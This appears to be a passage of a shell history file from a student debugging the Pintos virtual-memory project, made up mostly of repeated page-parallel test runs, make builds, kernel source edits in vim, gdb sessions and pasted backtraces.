-a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 6 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos -j 20 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 30 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 40 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 50 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 60 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 70 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 80 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 90 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 100 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 9 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 11 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos --gdb -j 10 -v -k -bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos --gdb -j 10 -v -k -bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clar +clear +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +amke +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +maek +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +ls +vim syscall.c +clear +vim process.c +vim filesys_open +vim filesys.c +vim file.c +vim file.h +vim file.c +ls +clear +vim exception.c +make +clear +vim process.c +vim bitmap.c +rm .bitmap.c.swp +vim bitmap.c +vim process.c +vim process.cx +vim process.c +vim exception.c +vim syscall.c +vim process.c +make +c;ear +clear +vim process.c +vim exception.c +clear +lks +ls +vim exception.c +cscope +clear +vim pagedir.c +vim palloc.c +clear +vim page.h +cscope +make +vim frame.c +vim swap.c +vim frame.c +vim child-linear.c +clear +make +vim child-linear.c +pintos-gdb kernel. +pintos-gdb kernel.o +quit +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +make +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +ls +make +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +maek +amek +make +clear +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul = 15 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=15 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=40 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=20 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=23 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f26c 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032392 0xc002d631 0xc002d72d 0xc00211c4 0xc002f651 0xc002fc77 0xc00221c5 0xc002241d 0x804ac47 0x8048aaf. +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=24 run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +make +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 2 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -j 2 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -j 2 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos -j 20 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f26c 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032392 0xc002d631 0xc002d72d 0xc00211c4 0xc002f04c 0xc002f2ae 0xc00221c5 0xc002241d 0x804831a. +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 423 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos-gdb kernel.o +clear +ls +make +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +maje +make +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +quit +clear +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +quit +make +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +clear +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +make +clera +clear +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make check +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/pt-grow-stack -a pt-grow-stack --swap-size=4 -- -q -f run pt-grow-stack +backtrace Call stack: 0xc002ab92 0xc0023e3b 0xc0023e96 0xc002e476 0xc002d917 0xc00211c4 0xc002f628 0xc002fc4e 0xc00221c5 0xc002241d 0x804ac86 +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/pt-grow-stack -a pt-grow-stack --swap-size=4 -- -q -f run pt-grow-stack +ls +clear +vim exception.c +vim process.c +clear +ls +vim exception.c +vim process.c +cscope +vim exception.c +make +vim exception.c +make +clear +vim exception.c +ls +vim timer.c +vim timer.c +ls +ls +vim exception.c +vim page-parallel.c +make +vim page-parallel.c +vim child-linear.c +make +vim child-linear.c +clear +vim child-linear.c +make +vim child-linear.c +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -ul=23 -q -f run page-parallel +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -ul=22 -q -f run page-parallel +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -ul=21 -q -f run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=20 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=22 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=21 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=22 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=21 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f26c 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032386 0xc002d631 0xc002d72d 0xc00211c4 0xc002f645 0xc002fc6b 0xc00221c5 0xc002241d 0x804ac51 0x8048ab9. +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=21 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=21 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=21 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032399 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2b5 0xc00221c5 0xc002241d 0x8048307. +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +Call stack: 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032399 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2b5 0xc00221c5 0xc002241d 0x8908428d +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032399 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2b5 0xc00221c5 0xc002241d 0x8908428d +clear +make +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032399 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2b5 0xc00221c5 0xc002241d 0x8908428d +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clera +clar +clear +pintos-gdb kernel.o +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +pintos-gdb kernel.o +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clea +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +pintos-gdb kernel.o +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +maje +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc00323b5 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2d1 0xc00221c5 0xc002241d 0x8908428d +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f27f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032399 0xc002d631 0xc002d72d 0xc00211c4 0xc002f05f 0xc002f2b5 0xc00221c5 0xc002241d 0x8908428d +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +maek +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos-gdb kernel.o +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +mkae +make check +clear +make +make check +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f26f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032396 0xc002d631 0xc002d72d 0xc00211c4 0xc002f04c 0xc002f1cf 0xc00221c5 0xc002241d 0x8048134 +clear +backtrace 0xc002ab92 0xc0023437 0xc002f26f 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032396 0xc002d631 0xc002d72d 0xc00211c4 0xc002f04c 0xc002f1cf 0xc00221c5 0xc002241d 0x8048134 +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc002ae16 0xc003213b 0xc00322f6 0xc002f2b1 0xc00221c5 0xc002241d 0x804aab0 +make +clear +make +Call stack: 0xc002ab92 0xc002ae16 0xc003213b 0xc00322f6 0xc002f2b1 0xc00221c5 0xc002241d 0x804aab0 +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos-gdb kernel.o +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +make +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +make +clar +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace 0xc002ab92 0xc0021162 0xc0020d46 0xc0024bd7 0xc00221c5 